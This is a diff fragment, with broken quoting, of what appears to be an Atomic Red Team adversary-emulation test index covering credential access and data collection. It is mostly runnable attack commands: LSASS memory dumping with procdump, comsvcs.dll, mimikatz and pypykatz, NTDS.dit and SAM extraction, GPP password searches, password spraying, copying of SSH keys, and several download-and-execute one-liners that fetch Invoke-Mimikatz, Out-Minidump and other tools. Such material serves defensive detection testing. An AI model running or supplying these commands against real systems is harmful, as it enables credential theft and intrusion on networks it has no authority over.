''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force -' + ' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' 
@@ -1266,11 +1266,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1318,10 +1318,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1386,7 +1386,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1404,7 +1404,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -1521,7 +1521,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1878,7 +1878,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 
@@ -2008,7 +2008,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2113,26 +2113,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2157,25 +2157,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} 
@@ -2348,15 +2348,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2526,7 +2526,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -2545,14 +2545,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -2871,10 +2871,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2914,10 +2914,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" 
@@ -2928,7 +2928,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -2943,10 +2943,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -2969,10 +2969,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -2981,7 +2981,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3024,10 +3024,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' 
@@ -3044,19 +3044,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz @@ -3073,35 +3073,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3118,7 +3118,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump 
@@ -3146,10 +3146,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3159,7 +3159,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz @@ -3181,7 +3181,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3203,15 +3203,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3221,7 +3221,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs 
@@ -3246,10 +3246,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe -' + ' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3257,7 +3257,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1557: @@ -3463,19 +3463,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy 
@@ -3502,34 +3502,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vassadmin''" to fulfuill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit @@ -3561,22 +3561,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI 
@@ -3595,19 +3595,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell @@ -3771,15 +3771,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: | tcpdump -c 5 -nnni #{interface} @@ -3803,15 +3803,15 @@ credential-access: dependencies: - description: 'Check if at least one of the tools are installed on the machine. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: 'echo "Install tcpdump and/or tshark for the test to run."; exit 1; -' + ' executor: command: "sudo tcpdump -c 5 -nnni #{interface} \nif [ -x \"$(command -v tshark)\" ]; then sudo tshark -c 5 -i #{interface}; fi;\n" 
@@ -3852,14 +3852,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -3867,7 +3867,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture @@ -4034,10 +4034,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4102,7 +4102,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1110.002: @@ -4270,7 +4270,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: 
@@ -4283,14 +4283,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -4382,7 +4382,7 @@ credential-access: description: 'Creates username and password files then attempts to brute force Active Directory accounts on remote host -' + ' supported_platforms: - windows input_arguments: @@ -4422,7 +4422,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: @@ -4472,7 +4472,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. -' + ' supported_platforms: - azure-ad input_arguments: @@ -4489,13 +4489,13 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -4681,13 +4681,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false 
@@ -4695,7 +4695,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -4794,13 +4794,13 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -4967,14 +4967,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -4990,17 +4990,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: @@ -5018,14 +5018,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux 
@@ -5044,14 +5044,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5070,7 +5070,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh T1003.007: technique: @@ -5138,7 +5138,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -5159,7 +5159,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -5187,7 +5187,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -5196,11 +5196,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python -' + ' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" -' + ' executor: name: sh elevation_required: true @@ -5212,7 +5212,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' T1606.002: technique: external_references: 
@@ -5359,42 +5359,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -5420,12 +5420,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -5478,7 +5478,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File -' + ' supported_platforms: - windows input_arguments: @@ -6293,7 +6293,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: 
@@ -6389,7 +6389,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -6405,10 +6405,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -6416,15 +6416,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -6440,25 +6440,25 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -6474,10 +6474,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash 
@@ -6485,15 +6485,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -6509,10 +6509,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -6521,7 +6521,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} -' + ' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' @@ -6604,10 +6604,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -6617,10 +6617,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | 
@@ -6640,10 +6640,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) -' + ' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -6681,11 +6681,11 @@ collection: dependencies: - description: 'Winzip must be installed -' + ' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' -' + ' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -6705,7 +6705,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation -' + ' supported_platforms: - windows input_arguments: @@ -6720,10 +6720,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) -' + ' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) -' + ' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -6742,7 +6742,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. -' + ' supported_platforms: - linux - macos 
@@ -6759,30 +6759,30 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) -' + ' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo Please set input_files argument to include files that exist -' + ' executor: name: sh elevation_required: false command: 'zip #{output_file} #{input_files} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -6802,16 +6802,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) -' + ' cleanup_command: 'rm -f #{input_file}.gz -' + ' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. -' + ' supported_platforms: - linux - macos @@ -6827,28 +6827,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) -' + ' prereq_command: 'test -e #{input_file_folder} -' + ' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists -' + ' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration -' + ' supported_platforms: - macos - linux 
@@ -6871,10 +6871,10 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; -' + ' get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1; -' + ' executor: name: sh elevation_required: false @@ -6886,7 +6886,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} -' + ' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -6936,7 +6936,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet -' + ' name: powershell T1119: technique: @@ -7006,7 +7006,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 -' + ' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -7022,7 +7022,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null -' + ' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -7111,7 +7111,7 